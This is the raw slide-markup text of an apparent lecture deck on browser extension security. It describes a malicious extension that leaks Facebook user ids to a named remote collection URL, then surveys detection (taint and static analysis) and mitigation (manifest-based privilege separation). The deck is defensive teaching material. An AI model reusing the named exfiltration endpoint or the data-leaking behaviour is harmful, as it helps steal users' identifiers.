            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-45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information</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-55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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-85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obtained,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>userid </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>leaked</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-95" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-80" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-95" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>website  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>(ht</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>p://dislikenew.doweb.fr/get2.php) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>that is not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>related </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-265" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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133600" y="4754117"/>
            <a:ext cx="5953505" cy="180060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84</a:t>
            </a:fld>
            <a:endParaRPr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73779" marR="5080" indent="-319913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Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>techniques of </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>and malicious  </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>extensions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85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93139" y="1639315"/>
            <a:ext cx="8145145" cy="37014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100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800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>taint</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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(Djeric</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-114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et</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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al.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-1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2012,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="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Karim</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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et</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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al.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-1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2013)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="180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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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browser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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="185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BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94444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800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Static</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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technique</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-25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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>identify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-65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browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-12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extensions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2250">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94444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11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approach</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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transforms</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105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code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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extension</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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static</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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single</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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assignment  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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which</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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to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generate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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function</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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call</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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graphs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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="185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BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94444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11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extension</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-90" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>converted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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database</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="3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facts.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buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2250">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="868680" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>In</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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combination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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10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call</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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graph,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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7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fact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database</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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out  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>capability leaks in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-16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extensions.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buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2250">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="133985" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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11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approach</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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detects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only</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-11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vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-11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extensions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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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suffers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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performance  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>overhead</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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due</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-65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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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within</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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10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entire</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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system</a:t>
            </a:r>
            <a:endParaRPr sz="18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703830" marR="5080" indent="-159258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Mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>techniques of </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>vulnerable and  </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>extensions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dirty="0"/>
              <a:t>86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93139" y="1639315"/>
            <a:ext cx="7992109" cy="39211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100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800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Separation of 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privilege levels </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(Barth et </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>al.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-31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2010)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buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2250">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="133350" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94444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105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concept</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-85" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>specify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-2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manifest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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(Google</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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Chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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extensions)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-25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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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limit  the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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harmful</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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consequence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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="180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exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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extensions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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="185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BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94444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800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>An</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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extension</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>specify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what</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-11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websites</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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it</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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intends</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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5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manifest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>file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2250">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" marR="303530" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94444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800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>An</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-75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attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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may</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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able</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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to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access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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pages</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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other</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-114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websites</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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read  sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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information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2250">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" marR="5080" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94444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800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="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an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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extension</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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requires</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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executing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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arbitrary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code, </a:t>
            </a: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corresponding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="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binary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>file  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>must be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>specified </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a: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204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manifest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2250">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="499109" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94444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1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>approach is cumbersome </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>adapt </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>across </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browsers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>requires  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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users</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-65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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-90" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>define</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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80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usage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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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advance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-40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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-45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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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manifest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr sz="18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703830" marR="5080" indent="-159258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Mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>techniques of </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>vulnerable and  </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>extensions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6830">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
